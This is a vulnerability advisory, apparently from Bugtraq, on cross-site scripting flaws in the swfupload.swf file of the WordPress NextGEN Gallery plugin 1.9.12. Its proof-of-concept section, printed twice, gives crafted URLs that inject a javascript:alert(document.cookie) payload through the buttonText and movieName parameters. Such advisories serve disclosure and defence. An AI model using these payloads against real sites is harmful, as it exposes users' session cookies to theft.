WordPress NextGEN Gallery Plugin 'swfupload.swf' Multiple Cross Site Scripting Vulnerabilities
BID:60433
Info
WordPress NextGEN Gallery Plugin 'swfupload.swf' Multiple Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 60433 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 07 2013 12:00AM |
| Updated: | Jun 07 2013 12:00AM |
| Credit: | Ryuzaki Lawlet |
| Vulnerable: |
WordPress NextGEN Gallery 1.9.12 |
| Not Vulnerable: | |
Exploit / POC
WordPress NextGEN Gallery Plugin 'swfupload.swf' Multiple Cross Site Scripting Vulnerabilities
An attacker can exploit these issues by enticing an unsuspecting user to visit a specially crafted URL.
The following example URIs are available:
http://www.example.com/Wordpress/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?buttonText=<ahref='javascript:alert(document.cookie)'>Click me</a>
http://www.example.com/Wordpress/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName=[XSS]
An attacker can exploit these issues by enticing an unsuspecting user to visit a specially crafted URL.
The following example URIs are available:
http://www.example.com/Wordpress/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?buttonText=<ahref='javascript:alert(document.cookie)'>Click me</a>
http://www.example.com/Wordpress/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName=[XSS]
References
WordPress NextGEN Gallery Plugin 'swfupload.swf' Multiple Cross Site Scripting Vulnerabilities
References:
References:
- NextGEN Gallery Homepage (Wordpress)
- WordPress Homepage (WordPress)